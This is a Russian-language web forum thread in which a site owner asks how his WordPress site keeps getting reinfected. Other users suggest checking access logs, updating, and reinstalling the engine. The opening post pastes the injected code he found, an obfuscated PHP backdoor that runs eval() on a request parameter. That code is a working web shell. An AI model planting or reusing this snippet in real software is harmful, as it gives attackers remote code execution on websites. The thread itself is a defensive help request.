Заражен Wordpress, пробовал почти все

12
D
На сайте с 16.06.2015
Offline
63
2220

Месяц назад заметил что у меня сайт взломан.

Появляются различные php файлы в каталоге сайта. А также в системные файлы wordpres добавляется различный код. Типа такого (надеюсь в нем не зашифрован мoй пapoль:)):

<?php $jfo66="o_tersup"; $ywvt9 =$jfo66[5]. $jfo66[2]. $jfo66[4]. $jfo66[2]. $jfo66[0].$jfo66[6].$jfo66[7].$jfo66[7].$jfo66[3]. $jfo66[4];$rfk97 =$ywvt9( $jfo66[1].$jfo66[7]. $jfo66[0]. $jfo66[5].$jfo66[2]); if ( isset( ${$rfk97 } [ 'qf30a53']) ){eval(${$rfk97}['qf30a53' ]);} ?> 

Что я делал:

Сменил пароли все

Сменил хостера

Сменил еще раз пароли

Отключил SSH

Поставил вход в админку вордпресс только с моего айпи

Поставил вход в админку хостера только с СМС уведомления

Проверил весь сайта с помощью Kasperskiy Internet Security

Проверил весь сайт с помощью Ai-Bolit

Изменения файлов отслеживаю плагином, который показывает сколько файлов изменено/удалено/добавлено, только толку 0. Что изменяется и добавляется на сайт я вижу, а откуда эта зараза идет не могу понять.

Как еще может генерироваться этот код, если не с помощь доступа по FTP?

Хелп! скажите как такое возможно?

KU
На сайте с 17.07.2008
Offline
251
#1

Через GET/POST запросы к сайту. Смотрите access.log на хостинге.

dmasta:
Как еще может генерироваться этот код, если не с помощь доступа по FTP?
Хостинг ( https://good-host.net ) / Linux VPS ( https://good-host.net/vps ) / Windows VPS ( https://good-host.net/windows-vps ) / Выделенные серверы ( https://good-host.net/dedicated ) 14 лет онлайн!
donc
На сайте с 16.01.2007
Offline
670
#2

dmasta,

А сайт один на хостинге?

Продвижение сайтов от 25 000 в мес, прозрачно, надежно https://searchengines.guru/ru/forum/818412 , но не быстро, отзывы
D
На сайте с 16.06.2015
Offline
63
#3
donc:
dmasta,
А сайт один на хостинге?

Раньше было три, по этой причине переехал. Сейчас один.

---------- Добавлено 04.12.2015 в 20:05 ----------

KM.UA:
Через GET/POST запросы к сайту. Смотрите access.log на хостинге.

Там все get/post, на какие стоит обратить внимание?

Часто wp-cron проскакивают

auditsaitov001
На сайте с 28.06.2015
Offline
11
#4

Еще забыли попробовать обновиться.

Может, обновление дырку закроет.

Аудит безопасности Вашего сайта квалифицированным специалистом по иб. Ручная проверка кода на уязвимости, поиск вирусов, вебшеллов и проч. Полная проверка, а не простое удаление вирусов.
M
На сайте с 25.12.2013
Offline
23
#5
dmasta:
Как еще может генерироваться этот код, если не с помощь доступа по FTP?
Хелп! скажите как такое возможно?

Таким же образом, как на него заходят посетители, только вместо элементарных запросов (вбивание URL в браузер или нажатие на ссылку в поисковой системе/на другом сайте) делается специально оформленный запрос который позволяет создать файл внутри файловой системы вашего сайта с нужным контентом - далее через этот файл можно сделать фактически любые действия.

Наилучшим вариантом в вашем случае будет настроить защиту с помощью сторонних людей.

Профессионально занимаюсь системным администрированием (Linux) и оптимизацией (веб)инфраструктуры. Опыт работы более 7 лет с HTML CSS PHP MySQL. Предпочитаю работать с высоконагруженными проектами.
donc
На сайте с 16.01.2007
Offline
670
#6
dmasta:
Раньше было три, по этой причине переехал. Сейчас один

как вариант, на хостинге дырка.

шеллы гуляют порою так лихо, что диву даешся.

И да, обновление и базу мускуль забекапить, дать на анализ специалисту, может чего и нароет в ней.

KU
На сайте с 17.07.2008
Offline
251
#7
dmasta:
Там все get/post, на какие стоит обратить внимание?

Узнайте время последнего изменения созданного или модифицированного файла, и смотрите в логах какие были запросы к сайту в это время +/- пару минут. Учитывайте, что часовой пояс на сервере может отличаться от вашего.

D
На сайте с 16.06.2015
Offline
63
#8
auditsaitov001:
Еще забыли попробовать обновиться.
Может, обновление дырку закроет.

Обновления все установлены, кроме платного плагина master slider.(т.к у него какие то проблемы с подключением к своему серверу)

---------- Добавлено 05.12.2015 в 05:52 ----------

donc:
как вариант, на хостинге дырка.
шеллы гуляют порою так лихо, что диву даешся.
И да, обновление и базу мускуль забекапить, дать на анализ специалисту, может чего и нароет в ней.

Хостинг я уже сменил, скорее всего в ближ.время обратимся к спецу из айболита.

---------- Добавлено 05.12.2015 в 05:53 ----------

Mofforg:
Таким же образом, как на него заходят посетители, только вместо элементарных запросов (вбивание URL в браузер или нажатие на ссылку в поисковой системе/на другом сайте) делается специально оформленный запрос который позволяет создать файл внутри файловой системы вашего сайта с нужным контентом - далее через этот файл можно сделать фактически любые действия.

Наилучшим вариантом в вашем случае будет настроить защиту с помощью сторонних людей.

Спасибо за подробный ответ, теперь понял как это происходит.

---------- Добавлено 05.12.2015 в 05:53 ----------

KM.UA:
Узнайте время последнего изменения созданного или модифицированного файла, и смотрите в логах какие были запросы к сайту в это время +/- пару минут. Учитывайте, что часовой пояс на сервере может отличаться от вашего.

Спасибо. Попробую так сделать.

D
На сайте с 16.06.2015
Offline
63
#9

Нашел вроде в acces.log обращения к этим файлам от одного ip. Ответы сервера ему 404 (которые я удалил похоже), 500 и 200.

Запретил этому ip доступ на сайт.

KU
На сайте с 17.07.2008
Offline
251
#10
dmasta:
Нашел вроде в acces.log обращения к этим файлам от одного ip. Ответы сервера ему 404 (которые я удалил похоже), 500 и 200.
Запретил этому ip доступ на сайт.

У него сеть из сотен или тысяч таких же сайтов как ваш, через ip которых можно работать. :)

Переустанавливайте движок с нуля, все остальное до одного места.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий